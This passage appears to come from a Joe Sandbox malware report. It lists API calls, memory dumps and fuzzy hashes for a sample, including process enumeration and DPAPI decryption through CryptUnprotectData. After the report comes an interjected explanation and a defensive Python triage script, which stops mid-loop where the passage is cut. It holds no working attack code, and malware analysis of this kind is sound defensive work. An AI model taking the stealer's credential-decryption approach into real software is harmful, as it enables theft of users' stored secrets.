                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 319dfde7f7a3c77f44706ee9e615fa06cdbc2d42c4ac20e5a104ef7cd74d0589
                                  • Instruction ID: 959d773400cf41e1431f42e72e09cf3775e17366766a5f024eaaa889b09f0ead
                                  • Opcode Fuzzy Hash: 319dfde7f7a3c77f44706ee9e615fa06cdbc2d42c4ac20e5a104ef7cd74d0589
                                  • Instruction Fuzzy Hash: 3E014075B403087BEB24DAD49C0AFAA7BBCEB44B14F104155FA15EA2C0D6B099408B90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !\[$$-|$<|s$wK.R
                                  • API String ID: 0-3816430732
                                  • Opcode ID: 78a971b6bdcbeec54dc4e8cdd679c36fc5e97a60ad7b79599992956ea76c9641
                                  • Instruction ID: ac35640d80d9f2138f917bb819ab296f488c970505f137769da113b12475b533
                                  • Opcode Fuzzy Hash: 78a971b6bdcbeec54dc4e8cdd679c36fc5e97a60ad7b79599992956ea76c9641
                                  • Instruction Fuzzy Hash: 12B22AF360C2009FE304AE2DEC8567ABBEAEFD4720F16853DE6C4C7744EA7558058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (J~$PS;{$;;7$_?\
                                  • API String ID: 0-2974008455
                                  • Opcode ID: 08754e7f7ca433de7fd0c88b1ce5aa0b294bb1d83fb8487a1a324704e6e2cdf6
                                  • Instruction ID: daa9bee8406318c750c466c5c409eb1b605c224aceee68c0712d9468de2165ea
                                  • Opcode Fuzzy Hash: 08754e7f7ca433de7fd0c88b1ce5aa0b294bb1d83fb8487a1a324704e6e2cdf6
                                  • Instruction Fuzzy Hash: C19205F3A0C214AFE704AE2DEC4567ABBE5EF94320F16493DEAC4C7744EA3558018697
                                  APIs
                                    • Part of subcall function 00FD71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00FD71FE
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FD3A96
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00FD3AA9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD3ABF
                                    • Part of subcall function 00FD7310: lstrlen.KERNEL32(------,00FB5BEB), ref: 00FD731B
                                    • Part of subcall function 00FD7310: lstrcpy.KERNEL32(00000000), ref: 00FD733F
                                    • Part of subcall function 00FD7310: lstrcat.KERNEL32(?,------), ref: 00FD7349
                                    • Part of subcall function 00FD7280: lstrcpy.KERNEL32(00000000), ref: 00FD72AE
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD3BF7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: c5db60ef511a5b8a834716be582625c32fdf0cf13e3160164993ab999e72eb38
                                  • Instruction ID: ff508232303f8099c2d614a639c829b4f549df1b60c078249b511c9e41e5273a
                                  • Opcode Fuzzy Hash: c5db60ef511a5b8a834716be582625c32fdf0cf13e3160164993ab999e72eb38
                                  • Instruction Fuzzy Hash: AB81E331901204CFC729CF58D948B95B7E2BB84329F2DC1AAD5089B3A2D776DD82DF81
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00FBEA76
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00FBEA7E
                                  • lstrcat.KERNEL32(00FDCFEC,00FDCFEC), ref: 00FBEB27
                                  • lstrcat.KERNEL32(00FDCFEC,00FDCFEC), ref: 00FBEB49
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 28bddbb51f349258826605c26e6749ed9e40087f204cbbe20474d62b590b7230
                                  • Instruction ID: 87166beda53b1d6027ada76e77627914ba73758d1a842487bbbbc700d1e5385d
                                  • Opcode Fuzzy Hash: 28bddbb51f349258826605c26e6749ed9e40087f204cbbe20474d62b590b7230
                                  • Instruction Fuzzy Hash: 8A31E475A00119ABDB109BD8EC45FEEB7BE9F84715F0440B5F909E6240D7B15A44CBA2
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00FD40CD
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00FD40DC
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD40E3
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00FD4113
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptHeapString$AllocateProcess
                                  • String ID:
                                  • API String ID: 3825993179-0
                                  • Opcode ID: 845328821e62b1ca5156d0911d0b72f00afe6064acfff8c45b239ed319acf7e3
                                  • Instruction ID: ee2ac8fbf1634749815d7646acb610c67dd27ea88305ce95ab3adf668b551aef
                                  • Opcode Fuzzy Hash: 845328821e62b1ca5156d0911d0b72f00afe6064acfff8c45b239ed319acf7e3
                                  • Instruction Fuzzy Hash: 55011E70600209ABDB24DFE5DC49BAABBEDEF45321F108169BD0987340DA71A980DB54
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00FDA3D0,000000FF), ref: 00FD2B8F
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00FD2B96
                                  • GetLocalTime.KERNEL32(?,?,00000000,00FDA3D0,000000FF), ref: 00FD2BA2
                                  • wsprintfA.USER32 ref: 00FD2BCE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: c43e9b2accf59da57fd3cea2d382abc676e5cfc7afd5d81c591f0f66a4a529dd
                                  • Instruction ID: efc9ef5fe921469e95dc2fc1a27357782c877d3eccb20b231dce453389410f78
                                  • Opcode Fuzzy Hash: c43e9b2accf59da57fd3cea2d382abc676e5cfc7afd5d81c591f0f66a4a529dd
                                  • Instruction Fuzzy Hash: AB0140B2904128ABCB249BC9DD45BBFBBFDFB4CB11F00011AF615A6280E7785540C7B1
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00FB9B3B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FB9B4A
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00FB9B61
                                  • LocalFree.KERNEL32 ref: 00FB9B70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: d1ac30a6f8598152d196af31618dcce25fcb1fa3986bc4c29b66ad5c62b465d4
                                  • Instruction ID: 5e658c0702a1d6e8e238aa9a3e5a2ddcf830830531c02563f6fae50715e8c021
                                  • Opcode Fuzzy Hash: d1ac30a6f8598152d196af31618dcce25fcb1fa3986bc4c29b66ad5c62b465d4
                                  • Instruction Fuzzy Hash: C7F0F9B06443126BE7305BA5AC49F967BA8AB44B60F200124FA45EA2C4D7B49880CBA4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (zs9$4,7}$A&s
                                  • API String ID: 0-1036545355
                                  • Opcode ID: e40d5996f97b74730c3a34e4956ecca02483116427118eb32abb53ffe429db18
                                  • Instruction ID: 1f4ff4e9ad650cf717a1d37e6b697493dad194ca2b69db07eb6ae1ec13b9dd0b
                                  • Opcode Fuzzy Hash: e40d5996f97b74730c3a34e4956ecca02483116427118eb32abb53ffe429db18
                                  • Instruction Fuzzy Hash: D19209F360C2149FE3046E2DEC8567ABBE9EF94320F1A493DEAC5C7744EA3558018697
                                  APIs
                                  • CoCreateInstance.COMBASE(00FDB110,00000000,00000001,00FDB100,?), ref: 00FCCB06
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00FCCB46
                                  • lstrcpyn.KERNEL32(?,?,00000104), ref: 00FCCBC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                  • String ID:
                                  • API String ID: 1940255200-0
                                  • Opcode ID: f899eea8737c7ac3d5fa8be2321e33da867d367dac379b26207ef7683e4c3b7c
                                  • Instruction ID: 168ff68ee6b86f3193f553fa5425822d670b86c2544780b0d41a5dbe532a4b07
                                  • Opcode Fuzzy Hash: f899eea8737c7ac3d5fa8be2321e33da867d367dac379b26207ef7683e4c3b7c
                                  • Instruction Fuzzy Hash: 5F314471A40619AFD714DBD4CC92FAAB7B99B88B10F104198FA14EB2D0D7B0AE45CBD1
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9B9F
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FB9BB3
                                  • LocalFree.KERNEL32(?), ref: 00FB9BD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: e00ef50e16f8faddae95997f3d7a61b637ca134fbdb8ac7f18922e6a0acd0b2e
                                  • Instruction ID: 2f7ada3bce11693de2db9e43998eb0a4d8f08eb39a21341d4bc2334b0a389150
                                  • Opcode Fuzzy Hash: e00ef50e16f8faddae95997f3d7a61b637ca134fbdb8ac7f18922e6a0acd0b2e
                                  • Instruction Fuzzy Hash: F30112B5E412096BE714DBE4DC45FABB778EB84704F104558EA04AB284D7B09E008BD1
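The record above is the one function in this dump that calls CryptUnprotectData, bracketed by LocalAlloc and LocalFree: the DPAPI call a stealer uses to turn secrets the user's own profile protected (browser-stored credentials, for instance) back into plaintext. The following is an added triage script, not Joe Sandbox's code and not part of the report. It parses function records written in the layout visible on this page (bullet "Key: Value" lines under headings such as "APIs", "Memory Dump Source" and "Similarity", with "Instruction Fuzzy Hash" closing each record), then flags two things: functions that call CryptUnprotectData, and functions whose dump region is writable, executable and image-backed, which is what "changes PE section rights" looks like at the memory level. The PAGE_* and MEM_IMAGE constants are the documented winnt.h values; that the fifth dotted field of a .sdmp name is the page protection and the seventh the memory type is an assumption drawn from the values on this page (00000040, 00000004, 00000080 and 01000000). The sample input embeds the record above plus a second, constructed record built from one of the PAGE_READWRITE dumps listed under "Associated".

```python
"""Triage helper for Joe Sandbox function records (added example, not the report's code)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# winnt.h constants (documented values).
PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE",
                0x80: "PAGE_EXECUTE_WRITECOPY"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
MEM_IMAGE = 0x1000000

# "Name.MODULE(args), ref: ADDR" as printed under the "APIs" heading.
API_RE = re.compile(r"(?P<name>\w+)\.(?P<module>[A-Z0-9_]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# ASSUMED field layout: pid.seq.uid.base.protect.state.type.extra.sdmp
SDMP_RE = re.compile(r"[0-9A-F]{8}\.[0-9A-F]{8}\.\d+\.(?P<base>[0-9A-F]{16})\."
                     r"(?P<protect>[0-9A-F]{8})\.[0-9A-F]{8}\.(?P<type>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp", re.I)


@dataclass
class FunctionRecord:
    apis: List[Tuple[str, str, str]] = field(default_factory=list)  # (name, module, ref)
    fields: dict = field(default_factory=dict)                       # "API ID" -> value, etc.
    protect: Optional[int] = None
    mem_type: Optional[int] = None


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into records; a record ends at its 'Instruction Fuzzy Hash' line."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):
            section = line          # heading: "APIs", "Memory Dump Source", "Similarity", ...
            continue
        item = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                cur.apis.append((m["name"], m["module"], m["ref"]))
            continue
        key, _, value = item.partition(":")
        value = value.strip()
        if key == "Source File":
            m = SDMP_RE.search(value)
            if m:
                cur.protect = int(m["protect"], 16)
                cur.mem_type = int(m["type"], 16)
        elif key != "Associated":       # the shared dump list adds nothing per function
            cur.fields[key] = value
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    return records


def triage(records: List[FunctionRecord]) -> List[Tuple[int, str]]:
    """Return (record index, reason) for every function worth a closer look."""
    findings = []
    for i, rec in enumerate(records):
        for name, _module, ref in rec.apis:
            if name == "CryptUnprotectData":
                findings.append((i, f"DPAPI decryption via CryptUnprotectData at {ref}: "
                                    "typical of credential-store theft"))
        if rec.protect in EXECUTABLE and rec.protect in WRITABLE and rec.mem_type == MEM_IMAGE:
            findings.append((i, f"code in {PAGE_PROTECT[rec.protect]} image memory: "
                                "section rights changed at runtime (self-unpacking)"))
    return findings


# Constructed sample: the CryptUnprotectData record from the report, then a second record
# built from one of its PAGE_READWRITE (00000004) dumps with no API calls.
SAMPLE_REPORT = """\
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9B9F
• LocalAlloc.KERNEL32(00000040,?), ref: 00FB9BB3
• LocalFree.KERNEL32(?), ref: 00FB9BD7
Memory Dump Source
• Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: Local$AllocCryptDataFreeUnprotect
• Instruction Fuzzy Hash: F30112B5E412096BE714DBE4DC45FABB778EB84704F104558EA04AB284D7B09E008BD1
Memory Dump Source
• Source File: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID:
• Instruction Fuzzy Hash: 97B208F360C2049FE304AE2DEC8577ABBE9EBD4720F1A853DE6C4C7744E63598058696
"""

if __name__ == "__main__":
    for idx, reason in triage(parse_records(SAMPLE_REPORT)):
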